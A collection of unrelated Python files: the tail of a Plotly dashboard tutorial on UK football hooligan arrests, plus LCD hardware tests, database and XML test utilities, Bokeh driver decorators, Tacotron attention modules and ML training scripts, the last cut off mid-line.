columns, we pass axis = 1 to the sort_values() function. # In[40]: #Changing name typesOffense.loc[4, 'Competition'] = 'National League' #Setting index typesOffense.set_index('Competition', drop=True, inplace=True) #Sorting the order of the columns typesOffense.sort_values(by='Premier League', axis = 1, ascending = False, inplace = True) typesOffense # Now we'll combine the final 3 columns into an 'Other Offense' category: # In[41]: otherOffenses = ['Breach of banning order ','Racist and indecent chanting','Possession of an offensive weapon'] typesOffense['Other Offenses'] = typesOffense[otherOffenses].sum(axis = 1) typesOffense.drop(otherOffenses, axis = 1, inplace = True) typesOffense # In order to combine the last three rows, we have to select them separately using the .loc indexer, then sum just those rows and create a DataFrame from them. # # Next, we'll tranpose and rename the DataFrame before appending it to the original. # # Finally, we'll drop the columns which we summed. # In[42]: competitions = ['Football League Trophy','Champions League and Europa League','Internationals'] #Making a DataFrame of the sum of the final three rows otherComps = DataFrame(typesOffense.loc[competitions, :].sum(axis = 0)) #Transposing that DataFrame and renaming the index otherComps = otherComps.T.rename(index={0 : 'Other Competitions'}) #Appending the new rows to the bottom, and dropping the three which comprise the new row typesOffense = typesOffense.append(otherComps) typesOffense.drop(competitions, axis=0, inplace = True) typesOffense # Finally, we'll get a list of the types of offense columns which we'll loop through to make the bar chart. We'll also use this list to add a text column for each type of offense. # In[43]: #List of columns offenseCols = typesOffense.columns.tolist() #Creating text columns for col in offenseCols: typesOffense['{}_text'.format(col,)] = typesOffense[col].apply(lambda x: '{}
{} offenses'.format(col, x)) typesOffense.head() # First of all let's get a new colour scheme. The colour here will represent the different types of offense: # In[44]: offenseColours = ["rgb(250,46,85)", "rgb(136,20,72)", "rgb(252,178,199)", "rgb(250,46,85)", "rgb(249,13,160)", "rgb(202,98,133)", "rgb(154,42,6)", "rgb(240,126,79)", "rgb(83,12,153)"] # Now we can add our bar traces to the dashboard. We'll put the competition type on the x-axis: # In[45]: bars = [] for i, off in enumerate(offenseCols): hooligans['data'].append({'type' : 'bar', 'x' : typesOffense.index, 'y' : typesOffense[off], 'text' : typesOffense['{}_text'.format(off)], 'name' : off, 'opacity' : 0.7, 'hoverinfo' : 'text', 'legendgroup' : 'typesOffense', 'marker' : {'color' : offenseColours[i], 'line' : {'width' : 0.5, 'color' : '#333'}}, 'xaxis' : 'x5', 'yaxis' : 'y5' }) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-15.png") # # Let's now change the domain of the x5 and y5 axes so we can see the ticklabels for this chart: # In[46]: hooligans['layout']['xaxis5'].update({'domain' : [0.06, 0.69]}) hooligans['layout']['yaxis5'].update({'domain' : [0.08, 0.26667], 'title' : 'Number of offenses'}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-16.png") # # ## (8) Showing offenses by home and away # # The eighth video lesson starts here. # # We'll now make the final chart for this dashboard. We're going to make a pie chart that shows the breakdown of offenses by whether the supporter/offender's team was playing at home or away. # # The data is below. First of all we need to sum the DataFrame. This will give us the totals for Home, Away and Neutral. It will also concatenate the club names together, but we'll drop this column. Next we'll rename the resulting column to N and finally, sort the DataFrame. # In[47]: homeAway = DataFrame(homeAway.sum()) homeAway = homeAway.drop(['Club'], axis = 0, ).rename(columns={0 : 'N'},).sort_values(by='N', ascending=False) homeAway # Let's now create our pie chart. We'll use red for away, green for home and blue for neutral. I'll also set an insidetextfont and outsidetextfont so we can easily read the labels when the chart is on the dashboard. # In[48]: competitionColours = ["rgb(228,204,241)", "rgb(132,109,255)", "rgb(246,131,218)", "rgb(216,160,108)", "rgb(93,54,118)", "rgb(154,16,115)"] homeAwayColours = [red, green, "rgb(132,109,255)"] homeawayPie = {'type' : 'pie', 'labels' : homeAway.index, 'values' : homeAway['N'], 'hoverinfo' : 'label+percent+value', 'legendgroup' : 'homeAway', 'insidetextfont' : {'size' : 16}, 'outsidetextfont' : {'size' : 16}, 'marker' : {'colors' : homeAwayColours, 'line' : {'width' : 1, 'color' : '#333'}}, 'direction' : 'clockwise'} pyo.iplot([homeawayPie]) py.image.save_as([homeawayPie], r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-17.png") # # Let's now append this to the dashboard; we'll need to set the domain of this pie chart to be the same as the x6 and y6 axes: # In[49]: print(hooligans['layout']['xaxis6']['domain']) print(hooligans['layout']['yaxis6']['domain']) # In[50]: homeawayPie.update({'domain' : { 'x' : [0.78, 1.0], 'y' : [0, 0.267]} }) hooligans['data'].append(homeawayPie) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-18.png") # # ## (9) Adding titles and finetuning the layout # # The ninth and final video lesson starts here. # # We've now added all the charts to our dashboard. There's still a few things to do before we finish: # 1. Add chart titles # 2. Add a title for the dashboard # 3. Set hovermode to closest # 4. Spread out the legend items # # ### Adding chart titles # # The easiest way to add chart titles is by using the make_subplots() function to generate a new subplot grid with titles. These titles are stored as annotations. We can then take the list of annotations from the subplot grid and put it straight into the dashboard. # # In[51]: template = make_subplots(rows = 3, cols = 4, specs = [[{'colspan' : 3}, None, None, {}], [{'colspan' : 2}, None, {'colspan' : 2}, None], [{'colspan' : 3}, None, None, {}]], subplot_titles = ['Most and least arrests by club', 'Arrests by competition', 'Arrests per 100,000 attendees', 'Total arrests by season', 'Types of offense', 'Offenses at home and away'], print_grid =False) template['layout']['annotations'] # Let's add these annotations to our dashboard. We'll also add in our dashboard title. # # We'll probably have to move the annotations about and change the domain of some of the charts to prevent any overlap, but let's take a look at the dashboard first: # In[52]: titleAnn = [{'text' : 'Football Hooligans in the UK', 'showarrow' : False, 'xref' : 'paper', 'yref' : 'paper', 'x' : 0.5, 'y' : 1, 'xanchor' : 'center', 'yanchor' : 'bottom', 'font' : {'size' : 30}}] hooligans['layout']['annotations'] += (template['layout']['annotations'] + titleAnn) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-19.png") # # So you can see that we've got a little bit of work to do to move the annotations and charts around so they don't overlap. We'll start at the top and move the table down by changing the domain of the y1 axis. We'll also change the domain of the pie trace so that it stays aligned with the table. # In[53]: hooligans['layout']['yaxis'].update({'domain' : [0.67333, 0.95]}) hooligans['data'][1]['domain'].update({'y' : [0.651, 0.95]}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-20.png") # # Let's now move the dashboard, table and arrests pie chart titles down, and the other titles up. # # These title annotations were the last seven we added to the dashboard, so they should be at the end of the list of annotations. # # We know that we have to move the first two chart titles down, and the rest of the chart titles up a bit. We also have to move the dashboard title annotation (the last one we added) down: # In[54]: for i, ann in enumerate(hooligans['layout']['annotations'][-7:]): if i in [0, 1]: ann['y'] -= 0.05 elif i == 6: ann['y'] -=0.025 else: ann['y'] += 0.03 pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-21.png") # # Let's now change the hovermode, legend position and tracegroupgap. We're not going to get the legend items to line up perfectly with the charts, but we should be able to spread them out enough to make it clear. # In[55]: hooligans['layout'].update({'hovermode' : 'closest'}) hooligans['layout']['legend'].update({'tracegroupgap' : 160}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-22.png") # # Let's send our dashboard to the Plotly cloud: # In[56]: #py.plot(hooligans, filename="Football hooligans in the UK", fileopt = 'overwrite') py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\py.plot-0.png") # # ### What have we learnt this lesson? # In this last lesson ih the course we've brought together everything that we previously learnt to create our most complex dashboard yet. We've included tables, pie charts, bar charts, line charts, chart titles and a dashboard title. # # I really hope you've enjoyed this course. # If you have any questions, please ask in the comments section or email import lcd from adc import adc_button,adc_switches import time button = adc_button() switches = adc_switches() def main(): # Main program block lcd.begin() print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.waitPage() print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.welcomePage('Dao Minh An', 'B1509360', 7) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addExtraInfoPage('Dao Minh An', 'B1509360') lcd.pointerPos(2, 1) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.welcomeTempPage(9) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.unknownIDPage() lcd.pointerPos(2, 2) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addFingerPage(1) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addFingerSuccessPage() print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addFingerFailPage() lcd.pointerPos(2, 1) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addRFIDPage() print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addRFIDSuccessPage() print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addRFIDFailPage() lcd.pointerPos(2, 1) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addInfoPage() print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.mainDatabasePage() lcd.pointerPos(3, 2) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.pointerPos(3, 3) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.exportSuccessPage() print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.exportFailPage() lcd.pointerPos(2, 1) time.sleep(3) lcd.clear() lcd.importPage() lcd.pointerPos(2, 1) time.sleep(3) lcd.clear() lcd.importSuccessPage() time.sleep(3) lcd.clear() lcd.importFailPage() lcd.pointerPos(2, 1) time.sleep(3) lcd.clear() lcd.mainLockerPage() lcd.pointerPos(3, 1) time.sleep(3) lcd.clear() lcd.infoLockerPage('', 'B1509360') time.sleep(3) lcd.clear() lcd.infoLockerTempPage() time.sleep(3) if __name__ == '__main__': try: main() except KeyboardInterrupt: pass ''' Utilities for test. ''' import os import pyodbc from logging import getLogger, basicConfig, DEBUG basicConfig(level='DEBUG') logger = getLogger() # Database Connections PG = 'pg' MSSQL = 'mssql' # Database Drivers drivers = {} drivers[PG] = '{PostgreSQL Unicode}' drivers[MSSQL] = '{ODBC Driver 17 for SQL Server}' def get_conn_str(db): ''' Get database connection string for the provided driver. ''' conn_str = ';'.join([ 'DRIVER={driver}', 'SERVER={server}', 'PORT={port}', 'DATABASE={database}', 'UID={username}', 'PWD={password}' ]) driver = drivers[db] if db == PG: return conn_str.format( driver=driver, server=os.environ['TEST_PG_DB_HOST'], database=os.environ['TEST_PG_DB_NAME'], username=os.environ['TEST_PG_DB_USER'], password=os.environ['TEST_PG_DB_PASSWORD'], port=5432 ) elif db == MSSQL: return conn_str.format( driver=driver, server=os.environ['TEST_MSSQL_DB_HOST'], database=os.environ['TEST_MSSQL_DB_NAME'], username=os.environ['TEST_MSSQL_DB_USER'], password=os.environ['TEST_MSSQL_DB_PASSWORD'], port=1433 ) else: raise RuntimeError('Unsupported database connection: {}'.format(db)) def connect(driver): ''' Connect to the database server. ''' connection_str = get_conn_str(driver) logger.debug('Connecting to Database Server [driver={}].'.format(driver)) return pyodbc.connect(connection_str) def exec_query(db, sql): ''' Execute a test SQL query on the given database. ''' connection = connect(db) logger.debug('Connection estabilished with database - {}.'.format(db)) logger.debug('Creating a new cursor.') cursor = connection.cursor() logger.debug('Executing SQL query.') result = cursor.execute(sql).fetchval() logger.debug('Received result set.') return result 1-10 import os from os import path from xml.etree import ElementTree RESOURCES_DIR = path.join(os.path.dirname(os.path.abspath(__file__)), 'resources') def get_resource_path(*parts): return path.join(RESOURCES_DIR, *parts) def assert_xml_equal(source1, source2): assert xml_compare( ElementTree.parse(source1).getroot(), ElementTree.parse(source2).getroot(), lambda s: print('Comparison error was: {}'.format(s)) ) ### #https://bitbucket.org/ianb/formencode/src/tip/formencode/doctest_xml_compare.py?fileviewer=file-view-default#cl-70 ### def xml_compare(x1, x2, reporter=None): if x1.tag != x2.tag: if reporter: reporter('Tags do not match: %s and %s' % (x1.tag, x2.tag)) return False for name, value in x1.attrib.items(): if x2.attrib.get(name) != value: if reporter: reporter('Attributes do not match: %s=%r, %s=%r' % (name, value, name, x2.attrib.get(name))) return False for name in x2.attrib.keys(): if name not in x1.attrib: if reporter: reporter('x2 has an attribute x1 is missing: %s' % name) return False if not text_compare(x1.text, x2.text): if reporter: reporter('text: %r != %r' % (x1.text, x2.text)) return False if not text_compare(x1.tail, x2.tail): if reporter: reporter('tail: %r != %r' % (x1.tail, x2.tail)) return False cl1 = x1.getchildren() cl2 = x2.getchildren() if len(cl1) != len(cl2): if reporter: reporter('children length differs, %i != %i' % (len(cl1), len(cl2))) return False i = 0 for c1, c2 in zip(cl1, cl2): i += 1 if not xml_compare(c1, c2, reporter=reporter): if reporter: reporter('children %i do not match: %s' % (i, c1.tag)) return False return True def text_compare(t1, t2): if not t1 and not t2: return True if t1 == '*' or t2 == '*': return True return (t1 or '').strip() == (t2 or '').strip() src/vm-django/release.py """ Functions used to handle mystery clue release. """ from django.utils import timezone from datetime import datetime, timedelta from django.conf import settings def get_current_release(): """ Returns the current release number, otherwise returns zero if START_DATETIME not yet reached. Note: - START_DATETIME, RELEASE_INTERVAL and MARK_INTERVAL are set in the main settings file - times are in the timezone TIME_ZONE, set in the main settings file - returned release number is a decimal (ie. 1.5) if current datetime is within the mark_interval Test: - before start date (pass) - at start date (pass) - after start date but before start date + interval (pass) - at start date + interval (pass) - after start date + interval (pass) :return: int """ release_interval = timedelta(days=int(settings.RELEASE_INTERVAL)) mark_interval = timedelta(days=int(settings.MARK_INTERVAL)) start = timezone.make_aware(datetime.strptime(settings.START_DATETIME, settings.DATETIME_FORMAT), timezone.get_default_timezone()) current = timezone.localtime(timezone.now(), timezone.get_default_timezone()) release = 0 mark = 0 date_time = start while date_time <= current: release += 1 date_time += release_interval if date_time <= current: mark += 1 date_time += mark_interval if release != mark: return release return release + 0.5 settings/filepath.py theory_PATH = "../data/theory"#!/usr/bin/env python import unittest import test.all_tests testSuite = test.all_tests.create_test_suite() text_runner = unittest.TextTestRunner().run(testSuite) ''' import unittest import os import sys print("[tests.py]") scriptDir = os.path.dirname(os.path.realpath(__file__)) if len(scriptDir) < 1: print("ERROR: couldn't get os.path.dirname of script file \"%s\"" % __file__) testDir = scriptDir # same since we're in test assert(os.path.isfile(os.path.join(testDir, "tests.py"))) repoDir = os.path.dirname(testDir) infrDir = os.path.join(repoDir, 'infrastructure') testInfrDir = os.path.join(testDir, 'infrastructure') print("repoDir: %s" % repoDir) print("infrDir: %s" % infrDir) print("testInfrDir: %s" % testInfrDir) assert(os.path.isdir(infrDir)) badInfrFile = os.path.join(infrDir, "shader_loader_test.py") testInfrFile = os.path.join(testInfrDir, "shader_loader_test.py") assert(not os.path.isfile(badInfrFile)) assert(os.path.isfile(testInfrFile)) sys.path.insert(0, repoDir) sys.path.insert(0, testDir) # ^ testDir is top priority since contains a test version of # infrastructure. print("[tests.py] Test path: \"%s\"" % testDir) loader = unittest.TestLoader() suite = loader.discover(testDir, pattern='*test.py') # sys.path.insert(0, repoDir) runner = unittest.TextTestRunner(verbosity=2) result = runner.run(suite) problems = len(result.errors) + len(result.failures) print("\nProblems: %s\n" % problems) exit(problems) ''' afonit/bokeh #----------------------------------------------------------------------------- # Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved. # # Powered by the Bokeh Development Team. # # The full license is in the file LICENSE.txt, distributed with this software. #----------------------------------------------------------------------------- ''' Provide a set of decorators useful for repeatedly updating a a function parameter in a specified way each time the function is called. These decorators can be especially useful in conjunction with periodic callbacks in a Bokeh server application. Example: As an example, consider the ``bounce`` forcing function, which advances a sequence forwards and backwards: .. code-block:: python from bokeh.driving import bounce @bounce([0, 1, 2]) def update(i): print(i) If this function is repeatedly called, it will print the following sequence on standard out: .. code-block:: none 0 1 2 2 1 0 0 1 2 2 1 ... ''' #----------------------------------------------------------------------------- # Boilerplate #----------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function, unicode_literals import logging log = logging.getLogger(__name__) from bokeh.util.api import general, dev ; general, dev #----------------------------------------------------------------------------- # Imports #----------------------------------------------------------------------------- # Standard library imports from functools import partial # External imports # Bokeh imports #----------------------------------------------------------------------------- # Globals and constants #----------------------------------------------------------------------------- __all__ = ( 'bounce', 'cosine', 'count', 'force', 'linear', 'repeat', 'sine', ) #----------------------------------------------------------------------------- # General API #----------------------------------------------------------------------------- @general((1,0,0)) def bounce(sequence): ''' Return a driver function that can advance a "bounced" sequence of values. .. code-block:: none seq = [0, 1, 2, 3] # bounce(seq) => [0, 1, 2, 3, 3, 2, 1, 0, 0, 1, 2, ...] Args: sequence (seq) : a sequence of values for the driver to bounce ''' N = len(sequence) def f(i): div, mod = divmod(i, N) if div % 2 == 0: return sequence[mod] else: return sequence[N-mod-1] return partial(force, sequence=_advance(f)) @general((1,0,0)) def cosine(w, A=1, phi=0, offset=0): ''' Return a driver function that can advance a sequence of cosine values. .. code-block:: none value = A * cos(w*i + phi) + offset Args: w (float) : a frequency for the cosine driver A (float) : an amplitude for the cosine driver phi (float) : a phase offset to start the cosine driver with offset (float) : a global offset to add to the driver values ''' from math import cos def f(i): return A * cos(w*i + phi) + offset return partial(force, sequence=_advance(f)) @general((1,0,0)) def count(): ''' Return a driver function that can advance a simple count. ''' return partial(force, sequence=_advance(lambda x: x)) @general((1,0,0)) def force(f, sequence): ''' Return a decorator that can "force" a function with an arbitrary supplied generator Args: sequence (iterable) : generator to drive f with Returns: decorator ''' def wrapper(): f(next(sequence)) return wrapper @general((1,0,0)) def linear(m=1, b=0): ''' Return a driver function that can advance a sequence of linear values. .. code-block:: none value = m * i + b Args: m (float) : a slope for the linear driver x (float) : an offset for the linear driver ''' def f(i): return m * i + b return partial(force, sequence=_advance(f)) @general((1,0,0)) def repeat(sequence): ''' Return a driver function that can advance a repeated of values. .. code-block:: none seq = [0, 1, 2, 3] # repeat(seq) => [0, 1, 2, 3, 0, 1, 2, 3, 0, 1, ...] Args: sequence (seq) : a sequence of values for the driver to bounce ''' N = len(sequence) def f(i): return sequence[i%N] return partial(force, sequence=_advance(f)) @general((1,0,0)) def sine(w, A=1, phi=0, offset=0): ''' Return a driver function that can advance a sequence of sine values. .. code-block:: none value = A * sin(w*i + phi) + offset Args: w (float) : a frequency for the sine driver A (float) : an amplitude for the sine driver phi (float) : a phase offset to start the sine driver with offset (float) : a global offset to add to the driver values ''' from math import sin def f(i): return A * sin(w*i + phi) + offset return partial(force, sequence=_advance(f)) #----------------------------------------------------------------------------- # Dev API #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- # Private API #----------------------------------------------------------------------------- def _advance(f): ''' Yield a sequence generated by calling a given function with successively incremented integer values. Args: f (callable) : The function to advance Yields: f(i) where i increases each call ''' i = 0 while True: yield f(i) i += 1 #----------------------------------------------------------------------------- # Code #----------------------------------------------------------------------------- robertchase/rhc import pytest from rhc.database.db import DB @pytest.fixture(scope='session') def db_session(): DB.setup(user='test', db='test_rhc', host='mysql', delta=True, commit=False) yield DB DB.close() @pytest.fixture def db(db_session): DB.start_transaction() yield DB DB.stop_transaction() import datetime import string import pytest import random from rdflib import Graph from datamodel import Datamodel @pytest.fixture def datamodel(): config = { "ngsi2": "datamodel/NGSI2", "ngsi-ld": "datamodel/NGSI-LD", "classes": "datamodel/classes" } return Datamodel(config) def test_get_dir_list(datamodel): assert len(datamodel.device_types) > 0 assert len(datamodel.iotdevice_types) > 0 assert len(datamodel.get_classes_files()) > 0 def test_ngsi_ld_read_values(datamodel): for file in datamodel.device_types: variables = datamodel.get_variables(file) assert len(variables) > 0 def test_ngsi_ld_create_entity(datamodel): for file in datamodel.device_types: props = {} properties = datamodel.get_properties_dict(file) for key, value in properties.items(): (order, name, property, optional, data_type, val) = value if data_type == 'datetime': props[property] = datetime.datetime.now() else: props[property] = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(32)]) entity = datamodel.create_entity(file, props) Graph().parse(data=entity, format='json-ld') def test_ngsi_ld_create_classes(datamodel): classes = datamodel.get_classes_files() for file in classes: entity = open(file, 'rt').read() Graph().parse(data=entity, format='json-ld') def test_create_iotdevice_from_json(datamodel): for file in datamodel.iotdevice_types: datamodel.create_iotdevice_from_json(file) # TODO: JSON validation conf/script/src/build_system/build_target/compiler_instance_targets.py __all__ = ['CompilerInstanceTargets'] from dataclasses import dataclass from .build_target_cls import * from ..compiler import * @dataclass(order=True, frozen=True) class CompilerInstanceTargets: compiler_instance: CompilerInstance build_targets: list[BuildTarget] def __iter__(self): return self.build_targets.__iter__() """ This file is copied from https://github.com/thuhcsi/tacotron/blob/master/model/attention.py """ import torch from torch import nn def get_mask_from_lengths(memory, memory_lengths): """Get mask tensor from list of length Args: memory: (batch, max_time, dim) memory_lengths: array like """ mask = memory.data.new(memory.size(0), memory.size(1)).zero_().bool() for idx, l in enumerate(memory_lengths): mask[idx][:l] = 1 return ~mask class BahdanauAttention(nn.Module): """ BahdanauAttention This attention is described in: , , and , "Neural Machine Translation by Jointly Learning to Align and Translate," in International Conference on Learning Representation (ICLR), 2015. https://arxiv.org/abs/1409.0473 """ def __init__(self, query_dim, attn_dim, score_mask_value=1e-8): super(BahdanauAttention, self).__init__() # Query layer to project query to hidden representation # (query_dim -> attn_dim) self.query_layer = nn.Linear(query_dim, attn_dim, bias=False) # For computing alignment energies self.tanh = nn.Tanh() self.v = nn.Linear(attn_dim, 1, bias=False) # For computing weights self.score_mask_value = score_mask_value def forward(self, query, processed_memory, mask=None): """ Get normalized attention weight Args: query: (batch, 1, dim) or (batch, dim) processed_memory: (batch, max_time, dim) mask: (batch, max_time) Returns: alignment: [batch, max_time] """ if query.dim() == 2: # insert time-axis for broadcasting query = query.unsqueeze(1) # Alignment energies alignment = self.get_energies(query, processed_memory) if mask is not None: mask = mask.view(query.size(0), -1) alignment.data.masked_fill_(mask, self.score_mask_value) # Alignment probabilities (attention weights) alignment = self.get_probabilities(alignment) # (batch, max_time) return alignment def init_attention(self, processed_memory): # Nothing to do in the base module return def get_energies(self, query, processed_memory): """ Compute the alignment energies """ # Query (batch, 1, dim) processed_query = self.query_layer(query) # Alignment energies (batch, max_time, 1) alignment = self.v(self.tanh(processed_query + processed_memory)) # (batch, max_time) return alignment.squeeze(-1) def get_probabilities(self, energies): """ Compute the alignment probabilites (attention weights) from energies """ return nn.Softmax(dim=1)(energies) class LocationSensitiveAttention(BahdanauAttention): """ LocationSensitiveAttention (LSA) This attention is described in: , , , , and , "Attention-based Models for Speech Recognition," in Advances in Neural Information Processing Systems, 2015, pp. 577-585. https://arxiv.org/abs/1506.07503 """ def __init__(self, query_dim, attn_dim, filters=32, kernel_size=31, score_mask_value=-float("inf")): super(LocationSensitiveAttention, self).__init__(query_dim, attn_dim, score_mask_value) # Location layer: Conv1d followd by Linear self.conv = nn.Conv1d(2, filters, padding=(kernel_size - 1) // 2, kernel_size=kernel_size, bias=False,stride=1,dilation=1) self.L = nn.Linear(filters, attn_dim, bias=False) # Cumulative attentions self.attention_weights = None self.cumulative = None def init_attention(self, processed_memory): # Initialize cumulative attention b, t, c = processed_memory.size() self.cumulative = processed_memory.data.new(b, t).zero_() self.attention_weights = processed_memory.data.new(b, t).zero_() def get_energies(self, query, processed_memory): # Query (batch, 1, dim) processed_query = self.query_layer(query) # Location feature location = torch.cat((self.attention_weights.unsqueeze(1),self.cumulative.unsqueeze(1)),dim=1) processed_loc = self.L(self.conv(location).transpose(1, 2)) # Alignment energies (batch, max_time, 1) alignment = self.v(self.tanh(processed_query + processed_memory + processed_loc)) # (batch, max_time) return alignment.squeeze(-1) def get_probabilities(self, energies): # Current attention self.attention_weights = nn.Softmax(dim=1)(energies) # Cumulative attention self.cumulative = self.cumulative + self.attention_weights # (batch, max_time) return self.attention_weights class AttentionWrapper(nn.Module): def __init__(self, rnn_cell, attention_mechanism): super(AttentionWrapper, self).__init__() self.rnn_cell = rnn_cell self.attention_mechanism = attention_mechanism def forward(self, query, attention, cell_state, memory, processed_memory=None, mask=None, memory_lengths=None): if processed_memory is None: processed_memory = memory if memory_lengths is not None and mask is None: mask = get_mask_from_lengths(memory, memory_lengths) # Concat input query and previous attention context cell_input = torch.cat((query, attention), -1) # Feed it to RNN cell_output = self.rnn_cell(cell_input, cell_state) # GRUCell or LSTMCell if type(self.rnn_cell) is nn.LSTMCell: query = cell_output[0] else: query = cell_output # Normalized attention weight # (batch, max_time) alignment = self.attention_mechanism(query, processed_memory, mask) # Attention context vector # (batch, 1, dim) attention = torch.bmm(alignment.unsqueeze(1), memory) # (batch, dim) attention = attention.squeeze(1) return cell_output, attention, alignment from options.train_options import TrainOptions from Training.train import train opt = TrainOptions().parse() opt.name = 'prostateHD' ## change #1 # opt.name = 'colon_Fine_100' # opt.dataroot = './Datasets/ColonPair_Fine/' opt.dataroot = './Datasets/ProstatePair/' ## change #2 opt.label_nc = 4 ## change #3 opt.contour = False ## change #4 Gs = [] Ss = [] NoiseAmp = [] NoiseAmpS = [] # opt.reals = [[64, 64], [128, 128], [192, 192], [256, 256], [320, 320], [384, 384], [448, 448], [512, 512]] opt.reals = [[64,64],[128,128],[192,192]] opt.erod = [1, 3, 6, 13] opt.alpha = 0.1 opt.scale_factor = 1.30 opt.noise_amp = 1 opt.stop_scale = len(opt.reals) opt.phase = "train" train(opt, Gs, Ss, NoiseAmp, NoiseAmpS, opt.reals) import logging import numpy as np from stable_baselines3.common.vec_env import VecEnvWrapper from stable_baselines3.common.vec_env.base_vec_env import ( VecEnvObs, VecEnvStepReturn, VecEnv, ) class VecHardGoalSampleWrapper(VecEnvWrapper): def __init__(self, venv: VecEnv, alpha: float = 0.65): super(VecHardGoalSampleWrapper, self).__init__(venv) self.episode_returns = None self.episode_lengths = None self.goal_locations = venv.get_attr("locations", 0)[0] maze = venv.get_attr("maze", 0)[0] self.avg_rewards = np.zeros(maze.shape) self.goal_sampled = 